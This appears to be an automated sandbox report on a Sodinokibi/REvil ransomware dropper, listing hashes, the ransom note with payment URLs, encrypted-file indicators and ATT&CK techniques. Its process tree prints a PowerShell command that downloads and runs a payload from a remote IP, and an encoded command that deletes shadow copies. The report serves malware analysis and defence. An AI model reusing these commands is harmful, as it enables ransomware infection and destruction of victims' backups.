sodinokibi | fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189

General

Target

058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Size

217B
MD5

ac5dca786af1760da0a1d3554009dc33
SHA1

983a1634a67dbebf5f835d167ba968f2daf3efb9
SHA256

fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189
SHA512

5eae6e71fa72edefd9a1373baa4add4e9dd9fc6ad2e7410f83fb56b1ec10633b5bf2d296016857c9667564ee1043a9207f7dc8ff0dab8b363598902eb1f8c611

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8

Extracted

Path

C:\s9m06ipi-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension s9m06ipi. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E699305EEEC93634 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E699305EEEC93634 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: /Kzdzo+j9wxoKJXLphYYdYyGW05XSEmmm4UdmOEhM5dLSHucX7llWQtekRTGxVmU G4m9r4G16zUi6C6VPbMV7kn+URZxyAc+xBUj2c0UBxi5shb52HH4Lf4ek5Y7EK+r kwPS/KfZiI7EY4m1i0pwzEoK9OrFPfpybwH5/za/y9g172Xp+7SHiSPZR6OSVtqR DhdqAWepDkacAbmi3Qcq5C6BAzupdC/FJB3IsfmNqD2DxPXZ0SztWx+lxu5A1hlg UGSmf/2sYrETkn/PwCj5ohHwsDCMU1IaXm19oFaok7a1eiv1kWrxx7He44QRb6s8 7Ciei5s5cGVoz7BMHWJECSzFoj78UAiQIWS9nJdPUL4Srt7bn7PEY8bjijeqE0it IHyiVQJOCyzTlEsRXJOeyUQV0EtyBotJrE+VHpiiCNURjG6whHPrBYD4h2Stoe28 37po/uDya3o64fc6kMRNRBC1lD1GYsaJLWPJbDlgeduW6Zgr4nQc8N6TysUXRY7f rZXz2mHlGmKMqqOQiFh1N+nMpXVwazf2kx5AawD7iT2I9UvPMPW6gOSEJ8l/9mvc ddXSKrfd9s6RTxobgUlbvc8JX9vjXGrshJP8Xb7vT2qbyJ6DdvmsdmlLr6pVkG4Z WCdke/ZzoGVO00HhjIZFljMZEPR5RBiX48nVqu3jXZlfxyBuglusONiKblm4cFhy DgIctB5HiQ5iYfWnEZrVjxlm0Qclsz+Y6OnZ2TO74aqc0g4KBkA9UQhpeCLuOtoq Uqf/8sPszD9Wn76elP8L2cVIiOq28h7o84B6qDsdv6lXx+hHyEv0Giw/sOs3w0ym nlAuY5W5vdNcGUUkX2jDat/lR1NZE7HbAhaDB/s7j8pXxp3nkYIiOMljznQ/gAvD Y2iETsJunPOMthSJYozy06gmD1q/29z4P/eINyTwomAep6QfTEtEBfM92tNEykUT bxbiID1xNR8w/95D1GIvEgUs1WxjvAEvUJbnn1blNVNdCukdQM9dxmFSgB5wD+sM dFPYl6aEyJfCnKdjLF5Kv7NKX55cTYBDY0nWPjwSh4eUD0OLL42SrNZw7fh/db4o VwUJ1sfjHbnYxCPRwYP/NJtPGx8UsvpyshJBMyHdboBMue8oVPaj97IJSeR0A0IE fmcy16TXvAzy1C3+CUtq6joAOXpo7JvZft79luMF9kjOrRSr9umYKsMDSeN1kq8D JZHrnzqpCoGcPzgleR6JmVjy+nOkFBpo/MIlW0vLoZQMIGu7zeMp4Oz1bghZs/EX Bbom2E+AAUQG6dLxTC8zpGq5llw= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E699305EEEC93634

http://decryptor.cc/E699305EEEC93634

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 3784 powershell.exe

flow	pid	process
3	3784	powershell.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\SuspendUnprotect.png => \??\c:\users\admin\pictures\SuspendUnprotect.png.s9m06ipi	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\ClearSubmit.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromAssert.tif => \??\c:\users\admin\pictures\ConvertFromAssert.tif.s9m06ipi	powershell.exe
File renamed	C:\Users\Admin\Pictures\ClearSubmit.tiff => \??\c:\users\admin\pictures\ClearSubmit.tiff.s9m06ipi	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0451mc55dg19.bmp"	powershell.exe

Drops file in Program Files directory 31 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\ExportReceive.eprtx	powershell.exe
File opened for modification	\??\c:\program files\SkipFormat.gif	powershell.exe
File opened for modification	\??\c:\program files\SplitTest.ini	powershell.exe
File opened for modification	\??\c:\program files\MoveRemove.jpeg	powershell.exe
File opened for modification	\??\c:\program files\UnlockFind.wpl	powershell.exe
File opened for modification	\??\c:\program files\UnblockProtect.mid	powershell.exe
File opened for modification	\??\c:\program files\SwitchSet.001	powershell.exe
File opened for modification	\??\c:\program files\ApproveNew.html	powershell.exe
File opened for modification	\??\c:\program files\AssertUnlock.potx	powershell.exe
File opened for modification	\??\c:\program files\DenyImport.jpg	powershell.exe
File opened for modification	\??\c:\program files\OutSet.WTV	powershell.exe
File created	\??\c:\program files (x86)\s9m06ipi-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompareStop.rm	powershell.exe
File opened for modification	\??\c:\program files\ResolveSearch.xls	powershell.exe
File opened for modification	\??\c:\program files\ConvertToComplete.cr2	powershell.exe
File opened for modification	\??\c:\program files\LockGroup.zip	powershell.exe
File opened for modification	\??\c:\program files\RepairGroup.png	powershell.exe
File opened for modification	\??\c:\program files\RequestDismount.wmv	powershell.exe
File opened for modification	\??\c:\program files\ShowSave.mp3	powershell.exe
File opened for modification	\??\c:\program files\StepStart.bmp	powershell.exe
File opened for modification	\??\c:\program files\CompressEdit.rm	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromStart.ttf	powershell.exe
File opened for modification	\??\c:\program files\OpenTest.asx	powershell.exe
File opened for modification	\??\c:\program files\ReadRemove.7z	powershell.exe
File opened for modification	\??\c:\program files\SuspendRename.jfif	powershell.exe
File opened for modification	\??\c:\program files\SuspendUnpublish.zip	powershell.exe
File opened for modification	\??\c:\program files\UndoTest.docm	powershell.exe
File created	\??\c:\program files\s9m06ipi-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\BlockFormat.3gp	powershell.exe
File opened for modification	\??\c:\program files\DebugDismount.contact	powershell.exe
File opened for modification	\??\c:\program files\LimitCompress.nfo	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3908	vssvc.exe
Token: SeRestorePrivilege	3908	vssvc.exe
Token: SeAuditPrivilege	3908	vssvc.exe
Token: SeTakeOwnershipPrivilege	3784	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 2728 wrote to memory of 3784	2728	cmd.exe	powershell.exe
PID 2728 wrote to memory of 3784	2728	cmd.exe	powershell.exe
PID 2728 wrote to memory of 3784	2728	cmd.exe	powershell.exe
PID 3784 wrote to memory of 3324	3784	powershell.exe	powershell.exe
PID 3784 wrote to memory of 3324	3784	powershell.exe	powershell.exe
PID 3784 wrote to memory of 3324	3784	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\058f5b8d291ac79c2bb7a3f231e3b5d8.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8');Invoke-SFWJRWOSAI;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3324-13-0x0000000000000000-mapping.dmp

Download
memory/3324-27-0x0000000009650000-0x0000000009651000-memory.dmp

Filesize
4KB

Download
memory/3324-26-0x0000000008DD0000-0x0000000008DD1000-memory.dmp

Filesize
4KB

Download
memory/3324-24-0x0000000008E40000-0x0000000008E41000-memory.dmp

Filesize
4KB

Download
memory/3324-14-0x0000000073B90000-0x000000007427E000-memory.dmp

Filesize
6.9MB

Download
memory/3784-8-0x0000000007C20000-0x0000000007C21000-memory.dmp

Filesize
4KB

Download
memory/3784-6-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/3784-7-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

Filesize
4KB

Download
memory/3784-0-0x0000000000000000-mapping.dmp

Download
memory/3784-9-0x0000000008520000-0x0000000008521000-memory.dmp

Filesize
4KB

Download
memory/3784-10-0x0000000008470000-0x0000000008471000-memory.dmp

Filesize
4KB

Download
memory/3784-11-0x0000000009C10000-0x0000000009C11000-memory.dmp

Filesize
4KB

Download
memory/3784-12-0x0000000009180000-0x0000000009181000-memory.dmp

Filesize
4KB

Download
memory/3784-5-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

Filesize
4KB

Download
memory/3784-4-0x0000000007300000-0x0000000007301000-memory.dmp

Filesize
4KB

Download
memory/3784-3-0x00000000074C0000-0x00000000074C1000-memory.dmp

Filesize
4KB

Download
memory/3784-2-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/3784-1-0x0000000073B90000-0x000000007427E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads